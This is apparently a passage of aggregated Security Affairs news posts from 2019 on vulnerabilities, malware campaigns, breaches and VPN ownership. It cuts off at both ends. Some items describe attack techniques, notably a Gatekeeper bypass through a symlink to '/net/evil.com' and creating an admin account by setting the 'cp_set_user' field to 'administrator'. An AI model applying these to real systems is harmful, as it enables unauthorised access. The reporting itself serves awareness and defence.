The scripts used by the hackers in this campaign scan for vulnerable hosts via Shodan. They scan for hosts with the 2375 port open and deploy more infected containers to the host after brute-forcing them.

Exposed APIs allow the attacker to execute commands on the Docker hosts which allow them to manage containers, and of course, deploy infected images from a Docker Hub repository under their control.

The analysis of the logs and traffic data coming to and from the honeypot, revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors used also another Docker Hub repository, associated with the ‘marumira‘ account, in previous attacks. Once this account was deactivated threat actors moved to zoolu2.

While the attackers launch a scanning process for Docker hosts to compromise, a custom built Monero coin-mining binary is executed in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that it is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered, it is added to a list (iplist.txt file), then attackers sort it for unique IPs. It also checks if the Docker host already runs a cryptocurrency-mining container and delete it if it exists.

The above list is sent to the C2 servers to deploy additional containers to other exposed hosts based on the IP list.

Attacks like the one detected by Trend Micro are not a novelty in the threat landscape, a similar campaign was also spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post Cryptojacking campaign uses Shodan to scan for Docker hosts to hack appeared first on Security Affairs.

Russian military plans to replace Windows with Astra Linux

The Russian army seems to be in the process of replacing the Windows system with the Debian-based Linux distribution Astra Linux.

Cyber security seems to subvert the globalization concept, governments are working to develop their own technology fearing possible espionage and sabotage activities of foreign states.

The Russian military is in the process of replacing the Windows system with the Linux distribution Astra Linux .

Astra Linux is a Debian-based distro developed in Russia by the Scientific/Manufacturing Enterprise Rusbitech RusBITech about ten years ago.

“Astra Linux is a RussianLinux-based computer operating system developed to meet the needs of the Russian army, other armed forces and intelligence agencies. It provides data protectionup to the level of “top secret” in Russian classified information grade.” reads the Wikipedia page. “It has been officially certified by Russian Defense Ministry, Federal Service for Technical and Export Control and Federal Security Service.”

The Astra Linux distribution was initially used only by private companies, later Russian government agencies started using it after it was certifified to handle classified information.

Recently the Russian Federal Service for Technical and Export Control (FSTEC) granted Astra Linux the security clearance of “special importance.” This level of authorization allows the use of the Linux OS in Russian Government offices with the highest standards of data privacy and the highest degree of secrecy.

The certification was granted for Astra Linux Special Edition version 1.6, (aka Smolensk).

The adoption of the Astra Linux distro in the Government environments will allow reducing costs security verification used by the Russian armed forces. Software and hardware qualification remain a crucial problem for almost any government that fear the possible presence of hidden backdoors.

Astra Linux

In the past, Russian Army officials raised concerns about the possible presence of hidden backdoors in the Windows operating system installed by U.S. intelligence agencies.  

The announcement of a move to Astra OS was made in January 2018 by the Russian Ministry of Defence.

A similar decision was also announced by the Chinese government that also plans to stop using the Microsoft operating system, especially after the recent ban of Chinese 5G technologies imposed by many western countries.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Astra, Russia)

The post Russian military plans to replace Windows with Astra Linux appeared first on Security Affairs.

0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch to temporary fix a still-unpatched local privilege escalation on systems without rebooting them.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper

The following video shows how the micropatch, composed of just five instructions, works on a vulnerable machine:

The exploit published by the expert triggers the flaw that resides in the Task Scheduler of Windows 10.

SandboxEscaper discovered that even starting with limited privileges it is possible to get SYSTEM rights by invoking a specific function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

According to Will Dormann, a vulnerability analyst at CERT/CC, the exploit is 100% reliable on x86 systems and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.ù

The micropatch prevents changing the set of permissions a normal user has over a system file.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)


The post 0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler appeared first on Security Affairs.

Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is warning again companies to patch older versions of Windows to avoid the exploitation of the flaw. Security experts fear a new massive attack that could affect millions of computers worldwide running still unpatched systems.

The availability of explot codes in the wild poses a severe risk for tne users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Recently, the popular expert Robert Graham has scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan,  

“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even if there has been no sign of attacks exploiting the flaw in the wild Microsoft recommends updating the vulnerable Windows versions as soon as possible. 

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not connected to the Internet are also exposed to the risk of a hack.



If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Microsoft warns for the second time of applying BlueKeep patch appeared first on Security Affairs.

Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without user explicit permission and any warning to the victims.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

The attacker would need to leverage two legitimate features implemented in macOS, the automount (aka autofs) and the lack of specific checks.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert.”By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.” 

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature that was exploited to include within ZIP archives symbolic links pointing to arbitrary locations, in this case, automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. The attack scenario sees the victim downloading the archive and follows the symlink, they are redirected to the location controlled by the attacker that is also trusted by Gatekeeper. 

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.”

Below a video PoC of the attack:

The expert suggests as workaround to disable automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot

Cavallarin reported his findings to Apple on February 22, 2019, the tech giant likely addressed it on May 15, 2019. 

“The vendor has been contacted on February 22th 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public. ”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows from Mirai, Azazel malicious codes.

HiddenWasp is a new sophisticated Linux malware still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware was involved in targeted attacks.  

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique, anyway the authors borrowed chunks of code publicly available open-source malware, such as Mirai and the Azazel rootkit

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script allows the malware to achieve persistence, it creates a new system’s user account and to update older variants if the system was already compromised. Then the script downloads a Tar archive that contains the rootkit, the Trojan, and the initial deployment script. 

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script” continues the experts.

Once installed the malware components, the main Trojan binary will be executed and the rootkit is added to the LD_PRELOAD mechanism. The malicious code also set up various environment variables and the script attempts to gain persistence by adding the trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continues the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. “

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space based rootkit enforced via LD_PRELOAD mechanism that is delivered in the form of an ET_DYN stripped ELF binary.

Experts linked the Trojan component with ChinaZ’s Elknot malware and other ChinaZ implants, a circumstance that suggests that the author of the HiddenWasp may have integrated some modified versions of the Elknot malware that could have been shared in Chinese hacking forums. 

Some artifacts found by the experts also belong to Chinese open-source rootkit for Linux Adore-ng likely because systems targeted with the HiddenWasp might have been previously compromised with this open-source rootkit. 

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)

The post HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel appeared first on Security Affairs.

The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researches have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak,

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs, the exposed data also include monitoring and alerts, reported system errors, misconfiguration, policy violations, potential attempted malicious breaches, and other cybersecurity events. Unsecured data also include personally identifying information (PII) of employees.

Exposed data is date back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.

Pyramid Hotel Group

The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland, and the UK, it includes locations of several brands such as Marriott, Sheraton, Plaza, Hilton Hotel and other independent hotels.

Data leaked by the company could be used by attackers to gather information about hotels’ network and security measures implemented to protect them. This information could be used by hackers in later attacks.

Below the timeline of discovery:

DATEEVENT
5/27/19Breach discovered by vpnMentor Research team
5/28/19Informed PHG of breach
5/28/19Received acknowledgement from PHG
5/29/19Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)

The post The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains appeared first on Security Affairs.

Checkers double drive-thru restaurants chain discloses card breach

Checkers and Rally’s, one of the largest chains of double drive-thru restaurants in the United States, disclosed a credit card breach.

“We recently became aware of a data security issue involving malware at certain Checkers and Rally’s locations.” reads a breach notice published by the company. “After discovering the issue, we quickly engaged leading data security experts to conduct an extensive investigation and coordinated with affected restaurants and federal law enforcement authorities to address the matter.”

According to the security notice, crooks breached the systems of the company and planted a PoS malware in its payments processing system allowing an unauthorized party to siphon payment card data of some guests. The malware only infected the point-of-sale systems at some Checkers and Rally’s locations.

“The malware was designed to collect information stored on the magnetic stripe of payment cards, including cardholder name, payment card number, card verification code and expiration date.” continues the notice. “Based on the investigation, we have no evidence that other cardholder personal information was affected by this issue.”

The company provided a list of the affected locations and the estimated windows of exposure during which the PoS malware was used to steal the guests’ card data.

102 restaurants have been impacted, roughly 15% of all of the locations.

Most of the impacted locations have been infected with the PoS malware between early 2018 and 2019, the list also includes some locations compromised back in 2017, and one infection dates back September 2016.

Checkers declared that the malicious code was completely removed from the payment systems in April 2019.

The company reported the card breach to the authorities and hired third-party security experts to contain and remove the malware

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders,” reads the notice Checkers. “We encourage you to review your account statements and contact your financial institution or card issuer immediately if you identify an unauthorized charge on your card. The payment card brands’ policies provide that cardholders have zero liability for unauthorized charges that are reported in a timely manner.”

The company encourages potentially affected guests to review their account statements and contact their financial institution or card issuer immediately if they identify an unauthorized charge on card.

Clients are entitled under U.S. law to one free credit report annually from each of the three nationwide consumer reporting agencies. 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Checkers, card breach)

The post Checkers double drive-thru restaurants chain discloses card breach appeared first on Security Affairs.

Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

Convert Plus plugin

A vulnerability ties with the lack of filtering when processing a new user subscription via a form implemented by the Convert Plus plugin that already has more than 100,000 active installations,

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to define the role they want, of course, administrator accounts are not in the list of possible options og a drop-down menu.

Experts at Defiant discovered that Convert Plus plugin includes an administrator role in a hidden field called “cp_set_user.” Experts pointed out that the value for this field could be supplied by the same HTTP request as the rest of the subscription entry, and users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It could very easy for an attacker to submit a subscription form and modify the value of the “cp_set_user” by setting the “administrator” value to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The hack allows to create a new admin account with a randomized password, but it is not a problem because the attacker can use a classic password reset procedure to change the password too.

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2., it is essential for administrators to update their install to the version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.

Below the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.



If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)

The post Convert Plus WordPress plugin flaw allows hackers to create Admin accounts appeared first on Security Affairs.

VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or actually located in China). Any data that is held in mainland China is wide open to access by Chinese authorities, confirming US Senators’ recent fears of American data falling into Chinese or Russian hands.

Innovative Connecting VPNs products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser
VPNs

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals that there is a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which creates the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same secretary, Loo Ping Yoo, and key addresses. Both Lemon Clove’s website and Innovative Connecting’s website are the same, with only small changes in text.

If you search VPN Proxy Master on Apple’s App Store, you can see the developer name appears as ALL Connected, while Innovative Connecting listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN are on similar Cloudfront domains that link to Innovative Connecting. The App Store policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps have the exact same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register turbovpn.co (developed by Innovative Connecting) also registered lemonclove.net, vpnsnap.com, and many others.

VPNs 2

Source: VPNpro

Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands – but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Other than this, there are two further crucial issues

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, you should follow these steps below:

  • carefully read the privacy policy of a VPN provider
  • read in-depth reviews of a VPN company on different platforms
  • ask for a recommendations on different communities and see their views
  • check if the company is GDPR compliant
  • read their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.


About The Author: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)

The post VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs appeared first on Security Affairs.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010, targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.

Emissary Panda Espionage-r3d1-1024x512

The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverage both readily available tools and custom malware in their operations, many tools are available for years, but in recent attacks, their code was updated.

In April 2019, the group targeted organizations of two different countries in the Middle East. Hackers hit webservers to install of webshells on SharePoint servers, threat actors leveraged the CVE-2019-0604 vulnerability to compromise SharePoint servers. 

Once compromised the network, attackers will upload a variety of tools to perform additional activities, including dumping credentials, and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by PaloAlto Networks.a

PaloAlto experts observed between April 1 and April 16, the threat actors-using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker. 

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.

Cyber spies also uncovered the use of additional sideloaded DLLs in this campaign. 

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.  “

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and will wait 90 days according to Google vulnerability policy disclosure before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details of the vulnerability after Microsoft will release a security patch to address the issue.

Ormandy anticipated that the vulnerability is a memory corruption bug and he shared via Twitter an image that demonstrates how to manage a “pop a shell in Notepad.”

The image posted by Ormandy shows that the vulnerability has been exploited to launch a Command Prompt, the expert confirmed he has already developed a “real exploit” for the issue.

Notepad

A message published by Chaouki Bekrar, founder of zero-day broker Zerodium, confirms that the type of issue found by the Google white hat hacker is not uncommon to find. The real surprise, according to Chaouki Bekrar, is to find an expert that report it to Microsoft instead of exploiting it or attempt to sell it.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)

The post Google white hat hacker found code execution flaw in Notepad appeared first on Security Affairs.

Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi are now installed in each and every place regardless of the size of the place; from international airports to small kiosks, you can find an internet connection everywhere. Most of these Wi-Fis are not operating on an individual level but are open for all. Public Wi-Fi is easily accessible by everyone be it customers of the shop or just travelers passing by and they are completely free. This means you can connect to the network and enjoy surfing without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to a survey three out of 4 people are connecting to public Wi-Fi at some point or place and that too without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi as it is open networking and can be accessed by anyone, and this anyone even includes cybercriminals. Some common threats associated with public Wi-Fi are listed here for warning users how insecure it could be:

  • Hackers and Predators

Public Wi-Fi and hotspots are the favorite hubs of hackers and predators. With public Wi-Fi, all the data that you send and receive is open for anyone to peek in. This data may include your personal and secretive details like emails, social media accounts, passwords, bank details, and other crucial stuff. The hackers act as the middle man between you and your designated sites and record essential details of your accounts. These details can be later used for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only keep an eye on your online activities but also look out for ways to invade your device. If the file sharing option of your device is turned on you are most likely to receive various system up gradation files to run. When you are on a public Wi-Fi, often these files are malware; a kind of virus that hijacks your device and allow cybercriminals to access all your offline data saved in your device.

  • Malicious Networks

When you are out in the streets or are in public places, there are various public Wi-Fis approaching your device. Some of these Wi-Fis are secured with a password while others are just open for all. The open public Wi-Fi is an actual threat as it can be created by bad guys with some wrong intentions. When your device is connected to a suspicious network, the hackers get hold of your device. They can not only peek into your device but can also use your device for any illegal purpose. You will not even get any notification of activities carried out through our device and stay ignorant.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. The sites that do not have SSL (Secure Sockets Layer) connection are quite vulnerable and cookies from these sites can be accessed easily by anyone. The risk of using these sites increases to a greater extent when you are on a public Wi-Fi as it provides zero protection against data theft.

  • Spying and Snooping

Spying and keeping track of any user`s activity becomes a lot easier with public Wi-Fi. There are small hardware devices known as packet sniffer or a packet analyzer that is often installed by service providers to monitor the traffic on the network. But setting up these devices is very easy and can be installed by anyone making the task of spies and detectives easier. Data obtained from these devices reveal the statistics of all your online activities carried out through the network and can put you in danger.

  • Propagating of Viruses

Public Wi-Fi often serves as the medium of propagating viruses. There are advanced viruses, known as Computer Worms that propagates really fast through any network. Unlike the classical computer viruses that require a particular program to run, these worms can infest any device which is on the same network as the affected one. Since on public Wi-Fi, a large number of people are simultaneously connected to the same network, there are very high chances of your device to become a victim.

Public WI-FI

Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not an easy task and this task becomes more challenging while you are using public Wi-Fi. Free Wi-Fi has its own temptations and at some instances, it becomes unavoidable to benefit from it. Though public Wi-Fi can never be completely secure, there are few tips that will assist you in making your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

